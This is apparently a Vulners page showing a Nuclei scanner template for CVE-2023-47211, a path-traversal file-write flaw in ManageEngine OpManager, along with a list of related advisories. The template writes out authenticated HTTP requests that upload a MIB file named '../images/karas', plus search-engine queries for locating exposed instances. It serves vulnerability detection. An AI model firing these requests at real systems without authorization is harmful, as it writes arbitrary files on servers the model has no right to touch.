| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| The vulnerability of the uploadMib function in the network monitoring software OpManager, OpManager MSP, OpManager Plus, Network Configuration Manager, OpUtils, and the network traffic analyzer NetFlow Analyzer allows a hacker to execute arbitrary code. | 22 Feb 202400:00 | – | bdu_fstec | |
| CVE-2023-47211 | 12 Jan 202421:17 | – | circl | |
| ZOHO ManageEngine OpManager Path Traversal Vulnerability | 8 Jan 202400:00 | – | cnnvd | |
| CVE-2023-47211 | 8 Jan 202414:45 | – | cve | |
| CVE-2023-47211 | 8 Jan 202414:45 | – | cvelist | |
| ManageEngine OpManager Path Traversal (CVE-2023-47211) | 12 Jan 202400:00 | – | nessus | |
| CVE-2023-47211 | 8 Jan 202415:15 | – | nvd | |
| CVE-2023-47211 | 8 Jan 202415:15 | – | osv | |
| Directory traversal | 8 Jan 202415:15 | – | prion | |
| PT-2024-1784 · Zoho · Manageengine Opmanager | 8 Jan 202400:00 | – | ptsecurity |
id: CVE-2023-47211
info:
name: ManageEngine OpManager - Directory Traversal
author: gy741
severity: high
description: |
A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
impact: |
Unauthenticated attackers can write arbitrary files to the system via path traversal, potentially creating backdoors or compromising system integrity.
remediation: |
Update ManageEngine OpManager to version 12.7.259 or later.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
- https://nvd.nist.gov/vuln/detail/CVE-2023-47211
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
cvss-score: 8.6
cve-id: CVE-2023-47211
cwe-id: CWE-22
epss-score: 0.47024
epss-percentile: 0.98688
cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: zohocorp
product: manageengine_firewall_analyzer
shodan-query:
- "http.title:\"OpManager Plus\""
- http.title:"opmanager plus"
fofa-query: title="opmanager plus"
google-query: intitle:"opmanager plus"
tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp,vuln
http:
- raw:
- |
POST /two_factor_auth HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
j_username={{username}}&j_password={{password}}
- |
POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
Host: {{Hostname}}
X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262
-----------------------------372334936941313273904263503262
Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
Content-Type: text/plain
../images/karas DEFINITIONS ::= BEGIN
IMPORTS
enterprises
FROM RFC1155-SMI;
microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
software OBJECT IDENTIFIER ::= { microsoft 1 }
systems OBJECT IDENTIFIER ::= { software 1 }
os OBJECT IDENTIFIER ::= { systems 3 }
windowsNT OBJECT IDENTIFIER ::= { os 1 }
windows OBJECT IDENTIFIER ::= { os 2 }
workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
server OBJECT IDENTIFIER ::= { windowsNT 2 }
dc OBJECT IDENTIFIER ::= { windowsNT 3 }
END
-----------------------------372334936941313273904263503262--
- |
POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
Host: {{Hostname}}
X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262
-----------------------------372334936941313273904263503262
Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
Content-Type: text/plain
../images/karas DEFINITIONS ::= BEGIN
IMPORTS
enterprises
FROM RFC1155-SMI;
microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
software OBJECT IDENTIFIER ::= { microsoft 1 }
systems OBJECT IDENTIFIER ::= { software 1 }
os OBJECT IDENTIFIER ::= { systems 3 }
windowsNT OBJECT IDENTIFIER ::= { os 1 }
windows OBJECT IDENTIFIER ::= { os 2 }
workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
server OBJECT IDENTIFIER ::= { windowsNT 2 }
dc OBJECT IDENTIFIER ::= { windowsNT 3 }
END
-----------------------------372334936941313273904263503262--
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "MIBFile with same name already exists")'
condition: and
extractors:
- type: regex
name: x_zcsrf_token
group: 1
part: header
regex:
- 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
internal: true
# digest: 4a0a00473045022100c41f6b9727c16b2ac2fe024a4711609142b90469db9e0489f7896e93671f994e022028d544bdfbbd4a18ce0454cfa22597f72dd3d9723805b6470af62f24a5f48db0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation